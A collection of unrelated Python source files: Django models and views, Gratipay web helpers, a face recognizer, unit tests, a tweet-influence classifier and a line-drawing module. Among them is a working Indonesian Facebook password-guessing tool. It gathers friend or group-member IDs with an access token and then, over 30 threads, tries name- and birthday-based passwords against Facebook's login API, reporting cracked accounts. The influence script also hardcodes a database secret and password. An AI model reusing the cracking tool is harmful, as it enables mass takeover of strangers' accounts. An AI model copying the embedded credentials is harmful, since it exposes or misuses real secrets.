('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('likers', models.ManyToManyField(related_name='favoritebooks', to='registration_app.User')),
('uploader', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='uploadedbooks', to='registration_app.User')),
],
),
]
|
# encoding: utf8
from __future__ import absolute_import, division, print_function, unicode_literals
import fnmatch
import random
import os
import re
from base64 import urlsafe_b64encode, urlsafe_b64decode
from datetime import datetime, timedelta
from aspen import Response, json
from aspen.utils import to_rfc822, utcnow
from postgres.cursors import SimpleCursorBase
import gratipay
BEGINNING_OF_EPOCH = to_rfc822(datetime(1970, 1, 1)).encode('ascii')
# Difference between current time and credit card expiring date when
# card is considered as expiring
EXPIRING_DELTA = timedelta(days = 30)
_email_re = re.compile(r'^[^@]+@[^@]+\.[^@]+$')
# exactly one @, and at least one . after @ -- simple validation, send to be sure
def is_valid_email_address(email_address):
return len(email_address) < 255 and _email_re.match(email_address)
def dict_to_querystring(mapping):
if not mapping:
return u''
arguments = []
for key, values in mapping.iteritems():
for val in values:
arguments.append(u'='.join([key, val]))
return u'?' + u'&'.join(arguments)
def _munge(website, request, url_prefix, fs_prefix):
"""Given website and requests objects along with URL and filesystem
prefixes, redirect or modify the request. The idea here is that sometimes
for various reasons the dispatcher can't handle a mapping, so this is a
hack to rewrite the URL to help the dispatcher map to the filesystem.
If you access the filesystem version directly through the web, we redirect
you to the URL version. If you access the URL version as desired, then we
rewrite so we can find it on the filesystem.
"""
if request.path.raw.startswith(fs_prefix):
to = url_prefix + request.path.raw[len(fs_prefix):]
if request.qs.raw:
to += '?' + request.qs.raw
website.redirect(to)
elif request.path.raw.startswith(url_prefix):
request.path.__init__(fs_prefix + request.path.raw[len(url_prefix):])
def use_tildes_for_participants(website, request):
return _munge(website, request, '/~', '/~/')
def canonicalize(redirect, path, base, canonical, given, arguments=None):
if given != canonical:
assert canonical.lower() == given.lower() # sanity check
remainder = path[len(base + given):]
if arguments is not None:
arguments = dict_to_querystring(arguments)
newpath = base + canonical + remainder + arguments or ''
redirect(newpath)
def get_participant(state, restrict=True, resolve_unclaimed=True):
"""Given a Request, raise Response or return Participant.
If restrict is True then we'll restrict access to owners and admins.
"""
redirect = state['website'].redirect
request = state['request']
user = state['user']
slug = request.line.uri.path['username']
qs = request.line.uri.querystring
_ = state['_']
if restrict:
if user.ANON:
raise Response(401, _("You need to log in to access this page."))
from gratipay.models.participant import Participant # avoid circular import
participant = Participant.from_username(slug)
if participant is None:
raise Response(404)
canonicalize(redirect, request.line.uri.path.raw, '/~/', participant.username, slug, qs)
if participant.is_closed:
if user.ADMIN:
return participant
raise Response(410)
if participant.claimed_time is None and resolve_unclaimed:
to = participant.resolve_unclaimed()
if to:
# This is a stub account (someone on another platform who hasn't
# actually registered with Gratipay yet)
redirect(to)
else:
# This is an archived account (result of take_over)
if user.ADMIN:
return participant
raise Response(404)
if restrict:
if participant != user.participant:
if not user.ADMIN:
raise Response(403, _("You are not authorized to access this page."))
return participant
def encode_for_querystring(s):
"""Given a unicode, return a unicode that's safe for transport across a querystring.
"""
if not isinstance(s, unicode):
raise TypeError('unicode required')
return urlsafe_b64encode(s.encode('utf8')).replace(b'=', b'~').decode('ascii')
def decode_from_querystring(s, **kw):
"""Given a unicode computed by encode_for_querystring, return the inverse.
We raise Response(400) if the input value can't be decoded (i.e., it's not
ASCII, not padded properly, or not decodable as UTF-8 once Base64-decoded).
"""
if not isinstance(s, unicode):
raise TypeError('unicode required')
try:
return urlsafe_b64decode(s.encode('ascii').replace(b'~', b'=')).decode('utf8')
except:
if 'default' in kw:
# Enable callers to handle errors without using try/except.
return kw['default']
raise Response(400, "invalid input")
def _execute(this, sql, params=[]):
print(sql.strip(), params)
super(SimpleCursorBase, this).execute(sql, params)
def log_cursor(f):
"Prints sql and params to stdout. Works globaly so watch for threaded use."
def wrapper(*a, **kw):
try:
SimpleCursorBase.execute = _execute
ret = f(*a, **kw)
finally:
del SimpleCursorBase.execute
return ret
return wrapper
def format_money(money):
format = '%.2f' if money < 1000 else '%.0f'
return format % money
def truncate(text, target=160, append=' …'):
nchars = len(text)
if nchars <= target: # short enough already
return text
if append: # recursive case
return truncate(text, max(target-len(append), 0), '') + append
truncated = text[:target]
if not target or ' ' in (truncated[-1], text[target]): # clean break
return truncated.rstrip()
return truncated.rsplit(' ', 1)[0] # trailing partial word
def is_card_expiring(expiration_year, expiration_month):
now = datetime.utcnow()
expiring_date = datetime(expiration_year, expiration_month, 1)
delta = expiring_date - now
return delta < EXPIRING_DELTA
def set_cookie(cookies, key, value, expires=None, httponly=True, path=b'/'):
cookies[key] = value
cookie = cookies[key]
if expires:
if isinstance(expires, timedelta):
expires += utcnow()
if isinstance(expires, datetime):
expires = to_rfc822(expires).encode('ascii')
cookie[b'expires'] = expires
if httponly:
cookie[b'httponly'] = True
if path:
cookie[b'path'] = path
if gratipay.use_secure_cookies:
cookie[b'secure'] = True
def erase_cookie(cookies, key, **kw):
set_cookie(cookies, key, '', BEGINNING_OF_EPOCH, **kw)
def filter_profile_nav(user, participant, pages):
out = []
for foo, bar, show_them, show_others in pages:
if (user.participant == participant and show_them) \
or (user.participant != participant and show_others) \
or user.ADMIN:
out.append((foo, bar, show_them, show_others))
return out
def to_javascript(obj):
"""For when you want to inject an object into a <script> tag.
"""
return json.dumps(obj).replace('</', '<\\/')
def get_featured_projects(db):
npopular, nunpopular = db.one("""
WITH eligible_teams AS (
SELECT *
FROM teams
WHERE not is_closed
AND is_approved
)
SELECT (SELECT COUNT(1)
FROM eligible_teams
WHERE nreceiving_from > 5) AS npopular,
(SELECT COUNT(1)
FROM eligible_teams
WHERE nreceiving_from <= 5) AS nunpopular
""", back_as=tuple)
# Attempt to maintain a 70-30 ratio
if npopular >= 7:
npopular = max(7, 10-nunpopular)
# Fill in the rest with unpopular
nunpopular = min(nunpopular, 10-npopular)
featured_projects = db.all("""
WITH eligible_teams AS (
SELECT *
FROM teams
WHERE not is_closed
AND is_approved
)
(SELECT t.*::teams
FROM eligible_teams t
WHERE nreceiving_from > 5
ORDER BY random()
LIMIT %(npopular)s)
UNION
(SELECT t.*::teams
FROM eligible_teams t
WHERE nreceiving_from <= 5
ORDER BY random()
LIMIT %(nunpopular)s)
""", locals())
random.shuffle(featured_projects)
return featured_projects
def set_version_header(response, website):
response.headers['X-Gratipay-Version'] = website.version
def find_files(directory, pattern):
for root, dirs, files in os.walk(directory):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(root, filename)
|
''' module face_recognizer.py
Purpose: identify a face
'''
import time
from enum import Enum
from numpy import load, expand_dims, asarray, dot, transpose, sqrt, linalg, array as np_array
from sklearn.preprocessing import LabelEncoder, Normalizer
from sklearn.svm import SVC
from utils import LEARNED_FACE_EMBEDDINGS_OUTPUT_FILE, \
PRINT_PERFORMANCE_INFO, \
is_ubuntu_64, \
is_coral_dev_board
from face_embedding_engine import FaceEmbeddingEngine
# We use descriptive variable and function names so
# disable the pylint warning for long lines
# pylint: disable=line-too-long
class MatchDistanceCalculationMethodEnum(Enum):
''' enum MatchDistanceCalculationMethodEnum
Enumerates all methods supported for calculating the distance
between the embedding of an unknown face and the embedding(s)
of a known face.
'''
COSINE_MEAN = 1 # Calculate mean of 'matched' trained embeddings and then measure angular distance from that to the face embedding
LINEAR_NORMALIZED_MEAN = 2 # Calculate mean of 'matched' trained embeddings and then measure linear distance from that to the face embedding
MEAN_LINEAR_NORMALIZED = 3 # Measure linear distance between face embedding and each 'matched' trained embedding then calculate mean of that
MATCH_CALCULATION_METHOD = MatchDistanceCalculationMethodEnum.COSINE_MEAN
IDENTIFCATION_PROBABILITY_THRESHOLD = 80 # percent
class FaceRecognizer():
''' class FaceRecognizer
Purpose: identify images of faces
'''
def __init__(self, embedding_model):
''' function constructor
Constructor for FaceRecognizer
Args:
embedding_model (FaceEmbeddingModelEnum): The model to use for generating
embeddings for face images
Returns:
None
'''
# Observed distances differed between Ubuntu and Coral dev board
if MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.COSINE_MEAN:
if is_ubuntu_64:
self.matched_distance_threshold = .6
elif is_coral_dev_board:
self.matched_distance_threshold = .4
else:
raise Exception("Unsupported platform")
elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.LINEAR_NORMALIZED_MEAN:
if is_ubuntu_64:
self.matched_distance_threshold = 12
elif is_coral_dev_board:
self.matched_distance_threshold = 8
else:
raise Exception("Unsupported platform")
# load face embeddings for 'learned' faces
data = load(LEARNED_FACE_EMBEDDINGS_OUTPUT_FILE)
training_embeddings, training_labels, validation_embeddings, validation_labels = data['arr_0'], data['arr_1'], data['arr_2'], data['arr_3']
# group embeddings by label for future comparison
self.trained_embedding_lists = {}
trained_labels = []
for index, label in enumerate(training_labels):
if label not in self.trained_embedding_lists:
self.trained_embedding_lists[label] = []
trained_labels.append(label)
self.trained_embedding_lists[label].append(training_embeddings[index])
# calculate mean value of all embeddings for each label
self.trained_embedding_mean_values = {}
for label in trained_labels:
mean_value_for_embeddings = np_array(self.trained_embedding_lists[label]).mean(axis=0)
self.trained_embedding_mean_values[label] = mean_value_for_embeddings
# normalize input vectors
in_encoder = Normalizer(norm='l2')
training_embeddings = in_encoder.transform(training_embeddings)
validation_embeddings = in_encoder.transform(validation_embeddings)
# label encode targets
self.out_encoder = LabelEncoder()
self.out_encoder.fit(training_labels)
training_labels = self.out_encoder.transform(training_labels)
validation_labels = self.out_encoder.transform(validation_labels)
# fit classifying model
self.classifying_model = SVC(kernel='linear', probability=True)
self.classifying_model.fit(training_embeddings, training_labels)
# load the FaceNet model to generate face embeddings with
self.embedding_engine = FaceEmbeddingEngine(embedding_model)
def get_name_for_face(self, face_image):
''' function get_name_for_face
Given an image of a face, generate an embedding for it and
try to identify it. Use the SVC model to identify the most
likely candidate then compare the embedding to the mean
value of the candidate's embeddings by determining the 'distance'
between the two. If the distance is within a certain threshold
then the candidate is considered a match.
Args:
face_model (PIL Image): The image of the face to try to
identify. The dimensions of the image must
match the dimensions required by the selected
embedding model.
Returns:
If a match is found, return the string name of the match,
otherwise return an empty string
'''
start_time = time.monotonic()
# get an embedding for the face image
face_embedding = self.embedding_engine.get_embedding(asarray(face_image))
generate_embedding_time = time.monotonic() - start_time
if PRINT_PERFORMANCE_INFO:
print("Generate embedding time: {:.3f}s".format(generate_embedding_time))
start_time = time.monotonic()
# run the embedding through classifier to see if we
# can identify the face from the embedding
sample = expand_dims(face_embedding, axis=0)
yhat_class = self.classifying_model.predict(sample)
yhat_prob = self.classifying_model.predict_proba(sample)
# get name (AKA the class 'label')
class_index = yhat_class[0] # only care about the top match
class_probability = yhat_prob[0, class_index] * 100
class_label = self.out_encoder.inverse_transform(yhat_class)[0]
# The SVC model returns match probababilities to all 'known' faces
# so it always returns results (and the total probability always
# equals 100%). So take the top 'match' and calculate the 'distance'
# to the face embedding we're examining. If the distance is within
# a certain threshold then the match is considered a true match.
name_for_face = ""
if class_probability > IDENTIFCATION_PROBABILITY_THRESHOLD:
if MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.COSINE_MEAN:
matched_embedding = self.trained_embedding_mean_values[class_label]
matched_distance = find_cosine_distance(matched_embedding, face_embedding)
elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.LINEAR_NORMALIZED_MEAN:
matched_embeddings = self.trained_embedding_lists[class_label][0]
matched_distance = linalg.norm(matched_embeddings - face_embedding).mean()
elif MATCH_CALCULATION_METHOD == MatchDistanceCalculationMethodEnum.MEAN_LINEAR_NORMALIZED:
linear_distances = linalg.norm(np_array(self.trained_embedding_lists[class_label]) - face_embedding, axis=1)
matched_distance = linear_distances.mean()
print("distance from {} ({:.1f}% SVC match) = {:.1f}".format(class_label, class_probability, matched_distance))
if matched_distance <= self.matched_distance_threshold:
name_for_face = class_label+" ("+'{:d}%'.format(int(class_probability))+")"
classify_embedding_time = time.monotonic() - start_time
if PRINT_PERFORMANCE_INFO:
print("Classify embedding: {:.3f}s".format(classify_embedding_time))
return name_for_face, (generate_embedding_time + classify_embedding_time)
def find_cosine_distance(face_embedding_1, face_embedding_2):
''' function find_cosine_distance
Given two face embeddings, calculate the cosine distance
between the two
Args:
face_embedding_1 (embedding): embedding for face 1
face_embedding_2 (embedding): embedding for face 2
Returns:
Cosine distance between the two face embeddings
'''
x_value = dot(transpose(face_embedding_1), face_embedding_2)
y_value = dot(transpose(face_embedding_1), face_embedding_1)
z_value = dot(transpose(face_embedding_2), face_embedding_2)
return 1 - (x_value / (sqrt(y_value) * sqrt(z_value)))
|
# Generated by Django 3.0.6 on 2020-10-12 17:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0004_auto_20201012_2008'),
]
operations = [
migrations.AlterField(
model_name='brand',
name='test',
field=models.IntegerField(null=True),
),
]
|
# -*- coding: utf-8 -*-
import pytest
from lib import ttbjson
def test_constructor():
bjson_obj = ttbjson.TwoTribesBinaryJSON()
assert bjson_obj.header == 'BJSON'
assert bjson_obj.version == 1
assert bjson_obj.data is None
with pytest.raises(TypeError, match=r'^header must be str$'):
bjson_obj.header = b'test'
with pytest.raises(TypeError, match=r'^version must be int$'):
bjson_obj.version = 'test'
|
# coding=utf-8
#
import unittest2
from itertools import takewhile, count
from py_functional_learning.list_problems import head, tail, numElements \
, firstNelements, elementAt, reverse
class TestList(unittest2.TestCase):
def __init__(self, *args, **kwargs):
super(TestList, self).__init__(*args, **kwargs)
def testHead(self):
self.assertEqual('a', head(['a']))
self.assertEqual(1, head(range(1,100)))
self.assertEqual('a', head(['a', 'b']))
self.assertEqual(3, head(filter(lambda x: x > 2, range(8))))
self.assertEqual(0, head(count())) # infinite list
def testHeadError(self):
try:
head([])
except ValueError:
pass # expected
else:
self.fail('something goes wrong')
def testTail(self):
self.assertEqual('a', tail(['a']))
self.assertEqual('b', tail(['a', 'b']))
self.assertEqual(6, tail(filter(lambda x: x < 7, range(100))))
def testTailError(self):
try:
tail([])
except ValueError:
pass # expected
else:
self.fail('something goes wrong')
def testNumElements(self):
self.assertEqual(0, numElements([]))
self.assertEqual(0, numElements(filter(lambda x: x > 5, range(4))))
self.assertEqual(1, numElements(['a']))
self.assertEqual(5, numElements('abcde'))
def testFirstNelements(self):
self.assertEqual([], list(firstNelements([], 2)))
self.assertEqual([1], list(firstNelements([1], 2)))
self.assertEqual([0, 1], list(firstNelements(range(5), 2)))
self.assertEqual(['a'], list(firstNelements('abc', 1)))
self.assertEqual([0, 1, 2], list(firstNelements(count(), 3)))
def testElementAt(self):
self.assertEqual('a', elementAt('abc', 1))
self.assertEqual(2, elementAt(range(3), 3))
self.assertEqual(5, elementAt(count(1), 5)) # infinite list
def testElementAtError(self):
try:
elementAt([], 1)
except ValueError:
pass # expected
else:
self.fail('something goes wrong')
try:
elementAt([1, 2], 3)
except ValueError:
pass # expected
else:
self.fail('something goes wrong')
def testReverse(self):
self.assertEqual([], reverse([]))
self.assertEqual('a', reverse('a'))
self.assertEqual('ab c', reverse('c ba'))
self.assertEqual( [3, 2, 1]
, reverse(takewhile(lambda x: x < 4, count(1)))) |
from django.contrib import messages
from django.core.paginator import Paginator
from django.shortcuts import render, redirect
from .models import Contact, post, Catagory, BlogComment
from django.http import HttpResponse
from shop.models import MyProfile
from blog.templatetags import extras
from .serializers import postSerializer
from rest_framework.renderers import JSONRenderer
def index(request):
dataa = post.acceptpost.all().order_by('-post_id')
datar = post.acceptpost.filter().order_by('-post_id')[0:3]
cat = Catagory.objects.all()
paginator = Paginator(dataa, 2)
page_num = request.GET.get('page')
page_obj = paginator.get_page(page_num)
d = {'data': page_obj, 'data1': datar, 'catag': cat}
return render(request, 'blog/home.html', d)
def post_detail(request, id):
dataa = post.objects.get(post_id=id)
datar = post.objects.filter().order_by('-post_id')[0:3]
cat = Catagory.objects.all()
com = BlogComment.objects.filter(post=dataa, parent=None)
replies = BlogComment.objects.filter(post=dataa).exclude(parent=None)
replyDict = {}
for reply in replies:
if reply.parent.sno not in replyDict.keys():
replyDict[reply.parent.sno] = [reply]
else:
replyDict[reply.parent.sno].append(reply)
d = {'i': dataa, 'data1': datar, 'catag': cat, 'comments': com, 'user': request.user, 'replyDict': replyDict}
return render(request, 'blog/blog-details.html', d)
def post_Search(request):
d = ""
if request.method == "POST":
datas = request.POST['query']
data1 = post.objects.filter(title__icontains=datas)
data2 = post.objects.filter(author__username__contains=datas)
data3 = post.objects.filter(content__icontains=datas)
data = data1.union(data2, data3)
if data.count == 0:
messages.warning(request, "no result can be found please refine your query")
d = {'data': data}
return render(request, 'blog/search.html', d)
def about(request):
return render(request, 'about.html')
def contact(request):
if request.method == "POST":
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
content = request.POST['content']
print("=========================")
print(name)
print("=========================")
contact = Contact(name=name, email=email, phone=phone, content=content)
contact.save()
return render(request, 'contractus.html')
def postComment(request):
if request.method == "POST":
comment = request.POST.get('comment')
user = request.user
userpf = MyProfile.objects.get(user=user)
postSno = request.POST.get('postSno')
parentSno = request.POST.get('parentSno')
postx = post.objects.get(post_id=postSno)
if parentSno == None:
comment = BlogComment(comment=comment, user=userpf, post=postx)
comment.save()
messages.success(request, "Your comment has been posted successfully")
else:
print(parentSno)
parent = BlogComment.objects.get(sno=parentSno)
comment = BlogComment(comment=comment, user=userpf, post=postx, parent=parent)
comment.save()
messages.success(request, "Your reply has been posted successfully")
return redirect(f"display-post/{postx.post_id}/")
# return redirect('/shop')
def postsdetail(request):
stu = post.objects.all()
serializer = postSerializer(stu,many=True)
json_data = JSONRenderer().render(serializer.data)
print(json_data)
return HttpResponse(json_data , content_type='application/json') |
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.1)
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[+] \x1b[1;92m[ Loading ] \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
normal = "\033[0;37;40m" #normal
miring = "\033[3;37;40m" #miring
#text warna
abu = "\033[1;30;40m" #abu abu
merah = "\033[1;31;40m" #merah
hijau = "\033[1;32;40m" #hijau
kuning = "\033[1;33;40m" #kuning
biru = "\033[1;34;40m" #biru
pink = "\033[1;35;40m" #pink
birumuda = "\033[1;36;40m" #birumuda
putih = "\033[1;37;40m" #putih
r = "\033[91m"
y = "\033[93m"
print
print putih+" ["+kuning+" Tool - Facebook "+putih+"]"
print putih+" ( ) > Termux "
print putih+" ( ) "+merah+"?????????????????????????????????"
print putih+" ( ) "+merah+"??"+kuning+" Author : Mr. Achmad "+hijau+"?? "
print putih+" _( )_ "+merah+"??"+kuning+" Contact WA : 085608035292 "+hijau+"??"
print putih+" [ INDONESIA ] "+hijau+"?????????????????????????????????"+normal
print "____________________________________________________________________"
print "_____________________"+biru+"Selamat_Datang_ya_Bangsat"+putih+"______________________"
print
def super():
global toket
os.system('reset')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print '\x1b[1;37;40m[1] Daftar Teman'
print '\x1b[1;37;40m[2] Member Grup'
print(y+pm)
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('reset')
jalan('\x1b[1;91m[+] [ selamat datang bangsat ] \x1b[1;97m...')
jalan('\x1b[1;91m[+] [ jangan lupa buat Subscribe youtube Achmad404 anjing ] \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('reset')
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=9999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mID Berhasil Di Ambil \x1b[1;91m: \x1b[1;97m' + str(len(id))
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[+] \x1b[1;92m[ Loading ] \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print(y+pm)
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
#achmad
super()
|
'''
Последний максимум
Найдите наибольшее значение в списке и индекс последнего элемента,
который имеет данное значение за один проход по списку,
не модифицируя этот список и не используя дополнительного списка.
Выведите два значения.
'''
num_list = list(map(int, input().split()))
max_val = num_list[0]
max_ind = 0
for i, n in enumerate(num_list):
if n >= max_val:
max_val = n
max_ind = i
print(max_val, max_ind)
|
from lib import weeks
from lib import tigergraphAPI
from lib import mongoAPI
import pandas as pd
import numpy as np
'''
Classificazione utenti Influenti e non e salvataggio su MongoDB distribuito
'''
def main():
## Connessione MongoDB
print("Connessione MongoDB...")
mongo_conn = mongoAPI.get_connection("localhost", 27027)
mongo_db = mongo_conn.get_db("dataman_project")
mongo_coll = mongo_db.get_collection("metriche")
print("Done")
# Connessione db tigergraph
print("Connessione Tigergraph...")
hostName = "https://dataman.i.tgcloud.io"
graphName = "twitter"
secret = "rc7os2t91a2u8cm3q4je9tchejr7u934"
userName = "tigergraph"
password = "datascience"
tiger_conn = tigergraphAPI.get_connection(hostName, graphName, secret, userName, password)
print("Done")
dates = weeks.get_weeks_list()
# Per ciascuna settimana
for i in range(0, len(dates)):
print(i, dates[i])
# Leggo i dati dal grafo
n_tweet_tot = tiger_conn.get_n_tweets(dates[i])
df_complete = tiger_conn.get_metrics(dates[i])
df_complete.reset_index(inplace = True)
df_complete.rename(columns = {"index" : "user_id"}, inplace = True)
# Ricavo le metriche
lambda_ = 0.7 # valore medio
df_complete["TS"] = (df_complete["OT1"] + df_complete["CT1"] + df_complete["RT1"]) / n_tweet_tot
df_complete["SS"] = df_complete["OT1"] / (df_complete["OT1"] + df_complete["RT1"])
df_complete["CS"] = df_complete["OT1"]/(df_complete["OT1"] + df_complete["CT1"]) + lambda_*(df_complete["CT1"] - df_complete["CT2"]) / (df_complete["CT1"] + 1)
df_complete["RI"] = df_complete["RT2"]* np.log(df_complete["RT3"])
df_complete["MI"] = df_complete["M3"] * np.log(df_complete["M4"]) - df_complete["M1"] * np.log(df_complete["M2"])
df_complete.fillna(0, inplace=True)
# Media delle metriche ricavate
metrics = df_complete.columns[-5:]
metrics_weights = [1, 1, 1, 1, 1]
df_complete['media'] = (df_complete[metrics] * metrics_weights).sum(axis=1)/sum(metrics_weights)
# I top 5% vengono classificati come "INFLUENTI"
df_complete['classe'] = 'NON_INFLUENTE'
df_complete.loc[df_complete['media'] > df_complete['media'].quantile(.95),'classe'] = 'INFLUENTE'
#print(df_complete.groupby("classe").count())
# Salvataggio in mongoDB
df_complete["week"] = i #Aggiungo la settimana per poter poi interrogare per settimana e recuperare il df in seguito
print("Salvataggio in mongoDB nella collection metriche...")
mongo_coll.save_df(df_complete)
print("Salvataggio completato")
del df_complete
if __name__ == "__main__":
main() |
from display import *
from matrix import *
import math
def add_circle(points, cx, cy, cz, r, step):
x0 = cx + r
y0 = cy
for i in range(step):
x1 = cx + r * math.cos(2 * math.pi * (i + 1) / step)
y1 = cy + r * math.sin(2 * math.pi * (i + 1) / step)
add_edge(points, x0, y0, cz, x1, y1, cz)
x0 = x1
y0 = y1
def add_curve(points, x0, y0, x1, y1, x2, y2, x3, y3, step, curve_type):
abcd = []
if curve_type == 0:
abcd = [[x0, x2, x1 - x0, x3 - x2], [y0, y2, y1 - y0, y3 - y2]]
matrix_mult([[2, -3, 0, 1], [-2, 3, 0, 0], [1, -2, 1, 0], [1, -1, 0, 0]], abcd)
print_matrix(abcd)
else:
abcd = [[x0, x1, x2, x3], [y0, y1, y2, y3]]
matrix_mult([[-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0]], abcd)
cx0 = x0
cy0 = y0
for i in range(step):
step = float(step)
cx1 = (i/step) * ((i/step) * (abcd[0][0] * (i/step) + abcd[0][1]) + abcd[0][2]) + abcd[0][3]
cy1 = (i/step) * ((i/step) * (abcd[1][0] * (i/step) + abcd[1][1]) + abcd[1][2]) + abcd[1][3]
add_edge(points, cx0, cy0, 0, cx1, cy1, 0)
cx0 = cx1
cy0 = cy1
def draw_lines(matrix, screen, color):
if len(matrix) < 2:
print "Need at least 2 points to draw a line"
p = 0
while p < len(matrix) - 1:
draw_line(screen, matrix[p][0], matrix[p][1], matrix[p+1][0], matrix[p+1][1], color)
p += 2
def add_edge(matrix, x0, y0, z0, x1, y1, z1):
add_point(matrix, x0, y0, z0)
add_point(matrix, x1, y1, z1)
def add_point(matrix, x, y, z=0):
matrix.append([x, y, z, 1])
def draw_line(screen, x0, y0, x1, y1, color):
dx = x1 - x0
dy = y1 - y0
if dx + dy < 0:
dx = 0 - dx
dy = 0 - dy
tmp = x0
x0 = x1
x1 = tmp
tmp = y0
y0 = y1
y1 = tmp
if dx == 0:
y = y0
while y <= y1:
plot(screen, color, x0, y)
y = y + 1
elif dy == 0:
x = x0
while x <= x1:
plot(screen, color, x, y0)
x = x + 1
elif dy < 0:
d = 0
x = x0
y = y0
while x <= x1:
plot(screen, color, x, y)
if d > 0:
y = y - 1
d = d - dx
x = x + 1
d = d - dy
elif dx < 0:
d = 0
x = x0
y = y0
while y <= y1:
plot(screen, color, x, y)
if d > 0:
x = x - 1
d = d - dy
y = y + 1
d = d - dx
elif dx > dy:
d = 0
x = x0
